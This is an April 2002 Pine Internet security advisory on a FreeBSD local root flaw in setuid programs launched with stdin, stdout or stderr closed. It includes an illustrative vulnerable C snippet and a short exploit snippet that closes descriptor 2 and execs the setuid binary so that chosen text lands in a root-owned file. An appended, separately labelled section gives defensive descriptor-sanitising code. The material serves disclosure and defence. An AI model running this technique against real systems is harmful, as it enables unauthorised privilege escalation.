SECURITYVULNS:DOC:2826
Apr 23, 2002 - 12:00 a.m.

Pine Internet Advisory: Setuid application execution may give local root in FreeBSD



Pine Internet Security Advisory

Advisory ID : PINE-CERT-20020401
Authors : Joost Pol <[email protected]>
Issue date : 2002-04-22
Application : Multiple
Version(s) : Multiple
Platforms : FreeBSD confirmed, maybe others.
Vendor informed : 20020406
Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt

Synopsis

    It is possible for a local user to execute a suid application with 
    stdin, stdout or stderr closed.

Impact

    HIGH. Local users should be able to gain root privileges. 

Description

    Consider the following (imaginary) suid application:

    -- begin of imaginary code snippet

            /* fopen() gets the lowest free descriptor; if fd 2 was
               closed before exec, this stream is backed by fd 2. */
            FILE * f = fopen("/etc/root_owned_file", "r+");

            if(f) {
            
                    /* stderr is fd 2, so this is written into the file. */
                    fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);

                    fclose(f);
            }

    -- end of imaginary code snippet
            
    Now, consider the following (imaginary) exploit:

    -- begin of imaginary exploit snippet

            while(dup(1) != -1); 

            close(2);

            execl("/path/to/suid_application",
                  "this text will endup in the root_owned_file", 0);

    -- end of imaginary exploit snippet

    Exploitation has been confirmed using the S/KEY binaries. 

Solution

    FreeBSD source trees were updated on the 21st of April 2002. 
    Please cvsup.



patrick oonk - pine internet - [email protected] - www.pine.nl/~patrick
T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl
PGPid A4E74BBF fp A7CF 7611 E8C4 7B79 CA36 0BFD 2CB4 7283 A4E7 4BBF
Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
Excuse of the day: it has Intel Inside
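
An application-level defence against the condition the advisory describes, as an added example that is not part of the advisory and not the FreeBSD source change: a set-user-ID program can verify at startup that descriptors 0, 1 and 2 are open and fill any closed slot with /dev/null before it opens other files. The helper name sanitize_std_fds is hypothetical, and /dev/null stands in for the advisory's root-owned file.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Hypothetical helper (not from the advisory): make sure descriptors
 * 0, 1 and 2 are open before the program opens anything else.
 * Any closed slot is filled with /dev/null, so a later open() or
 * fopen() can never be handed descriptor 0, 1 or 2.
 * Returns the number of slots filled, or -1 on error.
 */
int sanitize_std_fds(void)
{
    int repaired = 0;

    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                 /* slot is already open */
        if (errno != EBADF)
            return -1;

        /* Lower slots are open by now, so open() must return fd. */
        int nfd = open("/dev/null", O_RDWR);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {              /* unexpected: fail closed */
            close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

int main(int argc, char **argv)
{
    /* First statement of a set-user-ID program, before any open(). */
    if (sanitize_std_fds() == -1)
        _exit(1);                     /* stderr may be unusable */
    /* /dev/null stands in for the advisory's root-owned file. */
    FILE *f = fopen("/dev/null", "r+");
    if (f) {
        /* f is on descriptor 3 or higher, so stderr cannot alias it. */
        fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
        fclose(f);
    }
    return 0;
}
```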